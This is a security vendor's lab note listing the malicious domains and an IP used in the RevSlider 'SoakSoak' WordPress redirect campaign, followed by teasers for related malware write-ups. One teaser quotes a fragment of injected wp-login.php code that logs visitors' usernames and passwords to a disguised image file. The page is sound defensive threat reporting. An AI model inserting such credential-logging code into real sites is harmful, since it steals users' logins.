Sucuri Labs

RevSlider MalFrames – SoakSoak

The RevSlider SoakSoak malware campaign started with the soaksoak.ru domain (hence the name). However, since thelast 2 weeks, it has mutated and used different domains as the initial malware intermediary.

This is the full list so far:

soaksoak.ru: First one in the list. We identified more than 100,000 sites redirecting to it.
122.155.168.105: Started just after soaksoak, leveraging the /collect.js redirection. Almost 10,000 were blacklisted and compromised with it.
ads.akeemdom.com
wpcache-blogger.com: Second biggest campaign after soaksoak. More than 50,000 sites compromised and still going.
theme.wpcache-blogger.com
phoenix-credit.com: Current one active. Also leverages the /collect.js redirection and has compromised more than 11,000 different sites.

We will keep updating this list as the domains change and the attacks mutate.

Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Related Tags

Labs Note

Legacy Mauthtoken Malware Continues to Redirect Mobile Users

Krasimir Konov

November 4, 2020

During malware analysis, we regularly find variations of this injected script on various compromised websites: . The variable “_0x446d” assigns hex encoded strings in different…

Read the Post

Skimmer Plugin Hides Itself From wp-admin

Luke Leal

February 27, 2020

Our analyst Moe O recently discovered an interesting Javascript injection that was stealing submitted payment data from visitors on a WordPress website with a Woocommerce…

Read the Post

Obfuscated JavaScript Crypto Miner

Samuel Odendaal

August 1, 2018

During an incident response investigation, we detected an interesting piece of heavily obfuscated JavaScript malware. Once decoded, Crypto Miners were ran on customers visiting the…

Read the Post

Labs Notes Monthly Recap – May/2020

Juliana Lewis

June 3, 2020

In 2020, we doubled up our research efforts to report on many new attacks and hacks that we see in the wild. We believe that…

Read the Post

FBCMS Pharmacy Spam Website

Luke Leal

July 23, 2019

Whenever most people think of a website CMS, they most often think of the popular options like WordPress, Joomla, or Drupal. What do all three…

Read the Post

Simple WP login stealer

Luke Leal

July 28, 2019

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…

Read the Post

Malicious Pop-up Redirects Baidu Traffic

Krasimir Konov

September 29, 2020

Malicious pop-ups and redirects have become two extremely common techniques used by attackers to drive traffic wherever they want. \ During a recent investigation, we…

Read the Post

Reverse String WooCommerce WordPress Credit Card Swiper

Ben Martin

July 27, 2020

As 2020 continues to be the worst year in almost anybody’s lifetime, allow me to take this opportunity to stoke the fires of your existential…

Read the Post

SocGholish and NDSW NDSX malware, FakeUpdates, SilverFish (SolarWind) and ransomware

SocGholish Malware: Script Injections, Domain Shadowing, IPs & Obfuscation Techniques

Denis Sinegubko

Last Updated: February 21, 2024

In June 2022, we shared information about the ongoing NDSW/NDSX malware campaign which has been one of the most common website infections detected and cleaned…

Read the Post

Spam Doorway Manager

Luke Leal

July 25, 2019

While investigating a client’s compromised website, we saw a malicious file that was being used to manage an existing SEO spam doorway. We usually refer…

Read the Post

Related Tags

Related Categories

You May Also Like